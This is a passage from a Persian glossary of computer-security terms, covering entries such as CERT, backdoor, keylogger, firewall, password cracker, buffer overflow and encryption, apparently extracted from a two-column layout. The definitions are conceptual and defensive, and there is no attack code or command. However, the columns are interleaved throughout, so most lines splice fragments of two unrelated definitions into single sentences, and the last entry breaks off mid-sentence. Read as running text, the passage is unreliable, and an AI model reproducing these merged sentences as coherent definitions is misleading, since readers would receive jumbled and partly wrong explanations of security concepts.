ﻣﺤﺮﻣﺎﻧﮕﻲ ،ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ. ﺩﺭﻳﺎﻓﺖ ﭘﺎﺳﺦ ﭘﻴﺪﺍ ﻧﻤﻲﻧﻤﺎﻳﻨﺪ.
٣٩٠
٣٩٦
ﺗﻴﻢ ﻭﺍﻛﻨﺶ ﺑﻪ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ )(CERT ﺗﺴﺨﻴﺮ
ﺍﻳﻦ ﺗﻴﻢ ﺩﺭ ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﺭﻧﻲ ﻣﻠﻮﻥ ٣٩٧ﻭ ﺑﻌﺪ ﺍﺯ ﺣﻤﻠﺔ ﻳـﻚ ﻛـﺮﻡ ﻧﻘﺾ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺷﺮﻛﺖ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬـﺎﺟﻢ ﻛـﻪ
ﺍﻳﻨﺘﺮﻧﺘﻲ ٣٩٨ﺩﺭ ﺳﺎﻝ ۱۹۸۸ﺍﻳﺠﺎﺩ ﺷﺪ. ﻣﻲﺗﻮﺍﻧﺪ ﻣﻨﺠﺮ ﺑﻪ ﺗﻐﻴﻴﺮ ،ﺗﺨﺮﻳﺐ ،ﻭ ﻳﺎ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺷﻮﺩ.
٣٩١
٣٩٩
ﺛﺒﺖ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ
ﺫﺧﻴﺮﺓ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﻭﻗﺎﻳﻌﻲ ﻛﻪ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺭﻭﻱ ﺩﻳـﻮﺍﺭﺓ ﻓﺮﺁﻳﻨﺪ ﺍﺣﺮﺍﺯ ﺣﻖ ﻗﺎﻧﻮﻧﻲ ﻭ ﻣﺸﺮﻭﻉ ﺑﺮﺍﻱ ﻳﻚ ﺳﺮﻭﻳﺲ ﻳﺎ ﻛﺎﺭﺑﺮ
ﺁﺗﺶ ﻳﺎ ﺷﺒﻜﻪ ﻭﺍﻗﻊ ﻣﻲﺷﻮﻧﺪ. ﻲ ﺁﻥ ﺑﻪ ﺍﻃﻼﻋﺎﺗﻲ ﻛـﻪ ﺩﺭﺧﻮﺍﺳـﺖ ﻛـﺮﺩﻩ ﭘﻴﺶ ﺍﺯ ﺣﻖ ﺩﺳﺘﺮﺳ ﹺ
ﺍﺳﺖ .ﻃﻲ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ،ﻛﺎﺭﺑﺮ ﻳﻚ ﻧﺎﻡ ﻳﺎ ﺷـﻤﺎﺭﺓ ﺣـﺴﺎﺏ )ﺑـﺮﺍﻱ
ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﻣﻌﺮﻓﻲ ﻫﻮﻳﺖ( ﻭ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ )ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﻧـﺸﺎﻥ ﺑـﺮﺍﻱ
ﺑﺨﺶ ﺷﺸﻢ
٤٠٠
ﻳﺎ ﺁﮔﺎﻫﻲ ﺷﻤﺎ ﻛﻨﺘﺮﻝ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺩﺭ ﺩﺳﺖ ﺑﮕﻴﺮﺩ .ﺩﺭﺏ ﻣﺨﻔﻲ ﺛﺒﺖﻛﻨﻨﺪﺓ ﺻﻔﺤﻪﻛﻠﻴﺪ
ﻫﻤﻴــﺸﻪ ﻣﺨــﺮﺏ ﻧﻴــﺴﺖ؛ ﺑﻌﻨــﻮﺍﻥ ﻣﺜــﺎﻝ ﮔــﺎﻫﻲ ﺍﻭﻗــﺎﺕ ﺩﺭ ﺑﺮﻧﺎﻣﻪ ﺍﻱ ﻛﻪ ﻫﺮﺁﻧﭽﻪ ﺭﻭﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺗﺎﻳﭗ ﻣﻲﺷﻮﺩ ﺭﺍ ﺫﺧﻴﺮﻩ
ﺳﻴﺴﺘﻢ ﻋﺎﻣﻠﻬﺎ ﺣﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻣﺨـﺼﻮﺻﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺗـﺎ ﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺭﻭﻱ ﺩﻳـﺴﻚ ﻧﻮﺷـﺘﻪ ﻭ ﻳـﺎ ﺍﺯ
ﺗﻜﻨﻴﺴﻴﻨﻬﺎﻱ ﺑﺨﺶ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﺘﻮﺍﻧﻨﺪ ﺧﺪﻣﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﺷﺨـﺼﻲ ﺍﺭﺳـﺎﻝ ﺷـﻮﻧﺪ .ﺍﮔـﺮ ﺭﻭﻱ ﻳـﻚ
ﺩﻭﺭ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ .ﺍﻣـﺎ ﺩﺭ ﻋـﻴﻦ ﺣـﺎﻝ ﺍﻳـﻦ ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﺭﺍﻳﺎﻧﻪ ﺑﺮﻧﺎﻣﺔ ﺛﺒﺖﻛﻨﻨﺪﺓ ﺻﻔﺤﻪﻛﻠﻴﺪ ﻧـﺼﺐ ﺑﺎﺷـﺪ ،ﻫﺮﭼـﻪ ﻭﺍﺭﺩ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺗﻬﺎﺟﻢ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﻏﻴﺮﻣﺠﺎﺯ ﻧﻴﺰ ﺑﻜﺎﺭ ﺭﻭﻧـﺪ. ﺭﺍﻳﺎﻧﻪ ﺷﻮﺩ -ﺍﺯ ﺟﻤﻠﻪ ﻧﺎﻣﻬﺎﻱ ﻛﺎﺭﺑﺮ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ -ﺫﺧﻴـﺮﻩ
ﺩﺭﺏ ﻣﺨﻔﻲ ﺑﺎ ﻋﻨﻮﺍﻥ " "trap doorﻧﻴﺰ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ. ﻣﻲﺷﻮﺩ؛ ﺩﺭﺳﺖ ﻣﺜﻞ ﺯﻣﺎﻧﻴﻜﻪ ﻫﻨﮕـﺎﻡ ﺍﺳـﺘﻔﺎﺩﺓ ﺷـﻤﺎ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ،
ﻳﻜﻨﻔﺮ ﺍﺯ ﺑﺎﻻﻱ ﺷﺎﻧﺔﺗﺎﻥ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺭﺍ ﺯﻳﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
٤٠٦
ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ
٤٠١
ﺩﺭﺻﺪﻱ ﺍﺯ ﺯﻣﺎﻥ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑـﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ
ﻣﺨﺘﻠﻒ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ. ﻫﺮ ﻧﻮﻉ ﻓﻌﺎﻟﻴﺖ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻣﺮﺗﺒﻂ ﺑـﺎ ﺍﻃﻼﻋـﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ
ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ.
٤٠٧
ﺩﺭﻭﺍﺯﻩ
٤٠٢
ﻳﻚ ﭘﻞ ﺍﺭﺗﺒﺎﻃﻲ ﻣﻴﺎﻥ ﺩﻭ ﺷﺒﻜﻪ. ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ
ﺣﻔﺎﻇـﺖ ﻳــﻚ ﺷــﺮﻛﺖ ﺍﺯ ﺍﻓــﺸﺎﻱ ﺩﺍﺩﻩﻫــﺎ ﺗﻮﺳــﻂ ﮔﺮﻭﻫﻬــﺎﻱ
٤٠٨
ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ .ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﻣﺜﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣـﻲﺗﻮﺍﻧـﺪ ﺳـﻄﺤﻲ ﺍﺯ
ﺩﺭ ﺷﺮﺍﻳﻄﻲ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺗﻮﺍﻧـﺎﻳﻲ ﺍﻃﻤﻴﻨﺎﻥ ﺧﺎﻃﺮ ﻣﺒﻨـﻲ ﺑـﺮ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﺳـﺮﺍﺭ ﻣﺤﺮﻣﺎﻧـﺔ ﺣـﺮﻳﻢ
ﻭﺭﻭﺩ ﺑﻪ ﻣﺤﺪﻭﺩﺓ ﺍﻣﻨﻴﺘﻲ ،ﺧﻮﺍﻧﺪﻥ ،ﻧﻮﺷﺘﻦ ،ﺍﺻﻼﺡ ﻛـﺮﺩﻥ ﻭ ﻳـﺎ ﺧﺼﻮﺻﻲ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﻓﺸﺎ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﺪ.
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫـﺮ ﻳـﻚ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺳﻴـﺴﺘﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﺩﺳﺘﺮﺳـﻲ
٤٠٣
ﻣﻲﻧﺎﻣﻴﻢ. ﺣﻤﻼﺕ ﺑﺮﮔﺮﻓﺘﻪ ﺍﺯ ﺍﻃﻼﻋﺎﺕ
ﺻﻮﺭﺗﻲ ﺍﺯ ﺣﻤﻠـﻪ ﻛـﻪ ﺑـﻪ ﺷـﻜﻞ ﺩﺍﺩﻩﻫـﺎﻱ ﻇـﺎﻫﺮﹰﺍ ﺑـﻲﺿـﺮﺭ
٤٠٩
ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻛﺪﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻭ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻛﺎﺭﺑﺮ ﻳﺎ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺣﻤﻠﻪ ﺭﺍ
ﻛﻨﺘﺮﻝ ﻳﻚ ﻭﺳﻴﻠﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍﻩ ﺩﻭﺭ ﺍﺯ ﻃﺮﻳﻖ ﺧﻄـﻮﻁ ﺍﺭﺗﺒـﺎﻃﻲ ﺍﻧﺠﺎﻡ ﻣﻲﮔﺮﺩﺩ .ﺣﻤﻼﺕ ﺑﺮﮔﺮﻓﺘﻪ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻳﻚ ﻣﺴﺌﻠﻪ ﺟﺪﻱ
ﻣﺜﻞ ﺗﻠﻔﻦ ﻣﻌﻤﻮﻟﻲ ﻳﺎ ﺷﺒﻜﻪﻫﺎﻱ ﮔﺴﺘﺮﺩﻩ. ﺣﺘﻲ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺣﻔﺎﻇﺖﺷـﺪﻩ ﻫـﺴﺘﻨﺪ؛ ﭼﺮﺍﻛـﻪ ﻣﻤﻜـﻦ
٤١٠ ﺍﺳﺖ ﺩﺭ ﻗﺎﻟﺐ ﺩﺍﺩﻩ ﺑﻪ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺑﺮﺳﻨﺪ ﻭ ﺣﻤﻼﺗﻲ ﻋﻠﻴﻪ
ﺩﻓﺎﻉ ﺩﺭ ﻋﻤﻖ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺸﺖ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺷﺮﻭﻉ ﻛﻨﻨﺪ.
ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻫﺮ ﺳﻴﺴﺘﻢ ﺷﺒﻜﻪ ﺑﻪ ﻧﻮﺑﺔ ﺧﻮﺩ ﺗﺎ
ﺁﺧﺮﻳﻦ ﺣﺪ ﻣﻤﻜﻦ ﺍﻳﻤﻦ ﻣﻲﺷﻮﺩ. ٤٠٤
ﺣﻤﻠﺔ ﻋﻨﺼﺮ ﺩﺍﺧﻠﻲ
٤١١ ﺣﻤﻠﻪﺍﻱ ﻛﻪ ﺍﺯ ﺩﺭﻭﻥ ﻳﻚ ﺷﺒﻜﻪ ﺣﻔﺎﻇﺖ ﺷﺪﻩ ﻧﺎﺷﻲ ﻣﻲﺷﻮﺩ.
ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ
ﻳﻚ ﺳﻴﺴﺘﻢ ﺣﻔﺎﻇﺘﻲ ﻛﻪ ﺟﺮﻳﺎﻥ ﺗﺮﺍﻓﻴﻚ ﻭﺭﻭﺩﻱ ﺑﻪ ﺷﺒﻜﻪﻫﺎ ﻭ ٤٠٥
ﺩﺭﺏ ﻣﺨﻔﻲ
ﮔﺎﻫﻲ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨـﺪ .ﺑـﺮﺍﻱ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﺑﻼﻣﻮﺿﻮﻉ ﻛﺮﺩﻥ ﺭﻭﺍﻝ ﻭﺭﻭﺩ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﺑﺪﺳـﺖ
ﭘﻴﻜﺮﺑﻨــﺪﻳﻬﺎ ﻭ ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ ﻣﺨﺘﻠﻔــﻲ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ :ﺻــﺎﻓﻲﻫــﺎ، ﮔﺮﻓﺘﻦ ﻛﻨﺘﺮﻝ ﺭﺍﻳﺎﻧﻪ ﺑﺪﻭﻥ ﻧﻴﺎﺯ ﺑﻪ ﻛﺴﺐ ﺭﺿﺎﻳﺖ ﻣﺎﻟﻚ ﺁﻥ .ﺍﮔﺮ
ﺗﻘﻮﻳﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ،ﺭﻣﺰﮔـﺬﺍﺭﻱ ،ﺍﻳﺠـﺎﺩ ﺩﺭﺏ ﻣﺨﻔﻲ ﺭﻭﻱ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﻧﺼﺐ ﺷﺪﻩ ﺑﺎﺷﺪ،
ﻣﻨﻄﻘﺔ ﻏﻴﺮﻧﻈﺎﻣﻲ ) ،(DMZﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﻣـﺸﺎﺑﻪ .ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺨﺼﻲ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺘﻮﺍﻧﺪ ﺑـﺪﻭﻥ ﺗﺄﻳﻴـﺪ
ﺁﺗﺶ ﺑﻪ ﺩﻭ ﺷﻜﻞ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ :ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺑﺮﻧﺎﻣﺔ
٤١٧
ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺑﺎﺷﺪ ﻛﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻳﺪ ،ﻭ ﻳﺎ ﻣﻤﻜـﻦ
ﺗﺒﺪﻳﻞ ﻣﺘﻮﻥ ﺭﻣﺰﺷﺪﻩ ﺑﻪ ﻣﺘﻮﻥ ﺳﺎﺩﺓ ﺍﻭﻟﻴﻪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺍﺳﺖ ﻳﻚ ﻗﻄﻌﺔ ﻣﺠﺰﺍﻱ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻱ ﺑﺎﺷﺪ ﻛﻪ ﺑـﺮ ﺍﻃﻼﻋـﺎﺕ
ﺍﻟﮕﻮﺭﻳﺘﻢ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﺘﻘﺎﺑﻞ. ﺁﻧﭽﻪ ﺭﻭﻱ ﺷﺒﻜﻪ ﻓﺮﺳﺘﺎﺩﻩ ﻭ ﺩﺭﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ ﻧﻈﺎﺭﺕ ﻣـﻲﻛﻨـﺪ.
ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻗﺎﺩﺭﻧﺪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﺷﻤﺎ ﻭ ﺩﻧﻴﺎﻱ ﺧـﺎﺭﺝ ﺭﺍ
٤١٨
ﺭﻣﺰﻧﮕﺎﺭﻱ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﻭ ﻳﺎ ﺍﺯ ﺍﻧﺘﻘﺎﻻﺕ ﭘﻴﺶﺑﻴﻨﻲﻧﺸﺪﻩ
ﻳﻚ ﺷﺎﺧﻪ ﺍﺯ ﻋﻠﻢ ﺭﻳﺎﺿﻲ ﻛﻪ ﺑﺎ ﺗﻐﻴﻴﺮ ﺷـﻜﻞ ﺍﻃﻼﻋـﺎﺕ ﺑـﺮﺍﻱ ﻳﺎ ﻏﻴﺮﻣﺠﺎﺯ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻨﺪ.
ﭘﻨﻬﺎﻥ ﻛﺮﺩﻥ ﻣﻌﻨﺎ ﻭ ﻣﻔﻬﻮﻡ ﺁﻥ ،ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺗﻐﻴﻴﺮﺍﺕ ﻣﺨﻔﻴﺎﻧـﺔ
٤١٢
ﺩﺍﺩﻩ ،ﻭ ﻣﻤﺎﻧﻌﺖ ﺍﺯ ﻛـﺎﺭﺑﺮﺩ ﻏﻴﺮﻣﺠـﺎﺯ ﺁﻥ ﺳـﺮ ﻭ ﻛـﺎﺭ ﺩﺍﺭﺩ .ﺍﮔـﺮ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺩﺭ ﺳﻄﺢ ﺷﺒﻜﻪ
ﺗﻐﻴﻴﺮ ﺷـﻜﻞ ﺑﺮﮔـﺸﺖﭘـﺬﻳﺮ ﺑﺎﺷـﺪ ،ﺭﻣﺰﻧﮕـﺎﺭﻱ ﺷـﺎﻣﻞ ﺗﺒـﺪﻳﻞ ﻞ
ﺩﻳﻮﺍﺭﺓ ﺁﺗﺸﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﺗﺮﺍﻓﻴﻚ ﺩﺭ ﺳﻄﺢ ﺑﺴﺘﻪﻫـﺎﻱ ﭘﺮﻭﺗﻜـ ﹺ
ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﻪ ﺷﻜﻞ ﺍﺻﻠﻲ ﺧﻮﺩ ﻧﻴﺰ ﻣﻲﺷﻮﺩ. ﺷﺒﻜﻪ ﺑﺮﺭﺳﻲ ﻣﻲﺷﻮﻧﺪ.
٤١٩ ٤١٣
ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﻣﺰﺷﻜﻦ ﺭﻣﺰ ﻋﺒﻮﺭ
ﻣﺠﻤﻮﻋﻪ ﺍﻱ ﺍﺯ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ،ﭘﻴﻜﺮﺑﻨـﺪﻱﻫـﺎ ،ﻭ ﺗﻮﺻـﻴﻪ ﻫـﺎﻱ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺷﺎﻣﻞ ﻓﺮﻫﻨﮕﻬﺎﻱ ﻟﻐﺎﺕ ﻛﺎﻣﻞ ﻛﻪ ﺳـﻌﻲ
ﻣﺸﺮﻭﺡ ﺑﺮﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺷﺮﻛﺖ. ﺩﺭ ﻳﺎﻓﺘﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺍﺭﺩ.
٤٢٠ ٤١٤
ﺭﻭﺍﻟﻬﺎﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩ ﺭﻣﺰ ﻋﺒﻮﺭ
ﺭﻭﺍﻟﻬﺎﻱ ﺭﺳﻤﻲ ﻭ ﻣﻜﺘﻮﺏ ﻛﻪ ﮔﺎﻣﻬﺎﻱ ﻻﺯﻡ ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻳـﻚ ﻳﻚ ﻛﺪ ﻣﺨﻔﻲ ﻛﻪ ﺑﻪ ﻫﺮ ﻛﺎﺭﺑﺮ )ﻳﺎ ﺷﺎﻳﺪ ﺑﻬﺘﺮ ﺑﺎﺷﺪ ﺑﮕﻮﻳﻴﻢ ﺑﻪ ﻫﺮ ﻧﺎﻡ
ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺟﺪﻱ ﻣﺜﻞ ﻭﺭﻭﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﺪ .ﺗﻬﻴـﻪ ﻛﺎﺭﺑﺮﻱ( ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﺳﻴـﺴﺘﻢ ﺍﺯ ﺁﻥ ﻣﻄﻠـﻊ ﺍﺳـﺖ.
ﺟﺰﺋﻴﺎﺕ ﺭﻭﺍﻟﻬﺎﻱ ﻭﺍﻛﻨﺶ ﭘﻴﺶ ﺍﺯ ﻭﻗﻮﻉ ﻳﻚ ﺭﺧـﺪﺍﺩ ،ﻣﺸﺨـﺼﺔ ﻻ ﺑﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺩﺍﻧﺴﺘﻦ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﻌﻤﻮ ﹰ
ﺍﺻﻠﻲ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻣﻨﻴﺘﻲ ﺑﺎ ﻃﺮﺍﺣﻲ ﺧﻮﺏ ﺍﺳﺖ. ﻭ ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻢ ﻣﻨﺠﺮ ﻣﻲﺷﻮﺩ.
٤٢١ ٤١٥
ﺳﺮﺭﻳﺰﻱ buffer ﺭﻣﺰﮔﺬﺍﺭﻱ
ﻳﻚ ﻧﻘﺺ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺯﻣﺎﻧﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﺩﺍﺩﻩﻫـﺎ ﻓﺮﺁﻳﻨﺪ ﭘﻨﻬﺎﻥ ﻛﺮﺩﻥ ﻣﺤﺘﻮﻳﺎﺕ ﻓﺎﻳﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺗﻐﻴﻴـﺮ ﻳـﻚ
ﺭﺍ ﺑﻪ ﻓﻀﺎﻳﻲ ﺩﺭ ﺣﺎﻓﻈﻪ ﻣﻲﺑﺮﺩ ،ﺍﻣـﺎ ﺩﺭ ﺁﻥ ﻗـﺴﻤﺖ ﺍﺯ ﺣﺎﻓﻈـﻪ ﺭﺷﺘﻪ ﺍﺯ ﺣﺮﻭﻑ ﺑﻪ ﻳﻚ ﺭﺷﺘﺔ ﺩﻳﮕﺮ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺍﻟﮕـﻮﺭﻳﺘﻢ
ﻓﻀﺎﻱ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﺁﻥ ﺩﺍﺩﻩﻫﺎ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ .ﺑﺮﻧﺎﻣﻪ ﻣﻤﻜﻦ )ﻣﺜﻞ ﺍﻟﮕـﻮﺭﻳﺘﻢ .(DESﺭﻣﺰﮔـﺬﺍﺭﻱ ﺭﺍﻫـﻲ ﺍﺳـﺖ ﺑـﺮﺍﻱ ﺍﺧﺘﻔـﺎﻱ
ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻓﻀﺎﻱ ﺧﺎﻟﻲ ﺟﻬﺖ ﺩﺍﺩﻩﻫﺎ ﺗﺎﺯﻩ ،ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻳﻲ ﺍﻃﻼﻋــﺎﺕ ﺑﮕﻮﻧــﻪﺍﻱ ﺑــﺴﺎﺩﮔﻲ ﺧﻮﺍﻧــﺪﻩ ﻧــﺸﻮﺩ ،ﻣﮕــﺮ ﺗﻮﺳــﻂ
ﺭﺍ ﺣﺬﻑ ﻛﻨﺪ .ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ ﻫﻤﺔ ﺍﻧـﻮﺍﻉ ﻣـﺸﻜﻼﺕ ﺭﺍ ﺑـﻪ ﺑـﺎﺭ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﮔﺎﻥ ﻣﻮﺭﺩ ﻧﻈﺮ .ﺩﺭ ﺳﺎﺩﻩﺗﺮﻳﻦ ﻧﻮﻉ ﺭﻣﺰﮔﺬﺍﺭﻱ ،ﻳـﻚ
ﻻ ﺑﻪ ﺍﺗﻔﺎﻗﺎﺗﻲ ﻣﻨﺠﺮ ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﻣﻨﻴـﺖ ﺑﺮﻧﺎﻣـﻪ ﺭﺍ
ﺁﻭﺭﺩ ﻭ ﻣﻌﻤﻮ ﹰ "ﻛﻠﻴﺪ" ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑـﺮﺍﻱ ﺍﺧﺘﻔـﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ
ﺧﺪﺷﻪﺩﺍﺭ ﻣﻲﻛﻨﻨﺪ .ﻣﻲﺗﻮﺍﻥ ﭘﻴﺶ ﺍﺯ ﺍﻧﺘﻘﺎﻝ ﻫﺮ ﺩﺍﺩﻩ ﺑﻪ ﺣﺎﻓﻈـﻪ ﻣﻲﺷﻮﺩ .ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺗﻨﻬـﺎ ﭘـﺲ ﺍﺯ ﺭﻣﺰﮔـﺸﺎﻳﻲ
